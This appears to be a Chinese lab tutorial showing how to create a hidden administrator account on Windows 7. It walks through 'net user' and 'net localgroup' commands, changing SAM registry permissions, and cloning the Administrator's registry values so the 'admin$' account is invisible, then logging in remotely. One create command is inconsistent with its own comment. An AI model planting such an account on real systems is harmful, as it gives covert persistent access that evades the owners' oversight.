admin管理员组文章数量:1637675
(1)隐藏用户:
指在系统给上创建一个不可见或不易检测的用户账户。这种用户账户通常用于绕过安全措施、维持持久访问或执行恶意活动。隐藏用户可能不会在常规的用户列表中显示,并且往往具有特殊权限以便恶意用户可以在系统中执行未经授权的操作。
- 后门:
指通过绕过正常的认证和授权措施而获取对计算机系统、网络或应用程序的非法访问权限的一种方法。它通常是由恶意用户在系统中植入的,目的是在未经授权的情况下获取对系统的控制权或执行未经授权的操作。后门可能是在系统中创建隐藏用户、植入特定的代码或使用其他技术手段来实现。
实验环境:
win7
实验步骤:
1,查看win7系统当前用户
win+r 进入cmd命令模式
net user //再win7系统中查看所有用户
2,创建一个隐藏用户,并查看
net user admin 12345678 /add //创建一个admin$的用户 密码为12345678
3,从上所看,并没有通过命令查看到创建的用户,但是计算机管理中还是可以查看到该用户,所以还需要进一步隐藏
4,提升隐藏用户的用户权限
net localgroup administrators admin$ /add //提升隐藏用户权限,将隐藏用户添加到administrators组中
5,再计算机管理中查看是否添加用户组成功
6,进去注册信息表中,再第三步中点击权限进入第四步,把SAM文件权限修改至完全控制
7,找到对应的隐藏用户,并把该隐藏用户以及对应的16进制文件都以.reg格式导出,同时也需要把超级管理员用户的16进制文件导出
导出有三个文件,
a.reg是admin对应的user信息。
a$.reg 是admin$对应的names信息。
root.reg是administrator对应的user信息。
8,当三份文件都导出以后,将超级管理员对应的16进制文件中的标记行替换到到隐藏用户中对行
打开超级管理员对应的十六进制文件,复制第二步的所有内容
把复制的内容替换掉a.reg文件中
使用命令删除该用户,并再计算机管理中查看是否删除成功;
net user admin$ /del //删除admin$用户
9,使用注册表导入隐藏用户文件
接下来通过命令和计算机管理中查看是否有该用户,
通过上面的查询,均未查到隐藏用户信息
net user admin$ /active:yes //激活该用户
10,再开启一台win7服务器
通过远程连接到该用户
远程登录成功,隐藏账户配置完成;(注意,当通过隐藏用户连接后,本地登录用户将断开连接)
版权声明:本文标题:win7系统创建隐藏用户 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://m.elefans.com/dianzi/1729253432a1192430.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论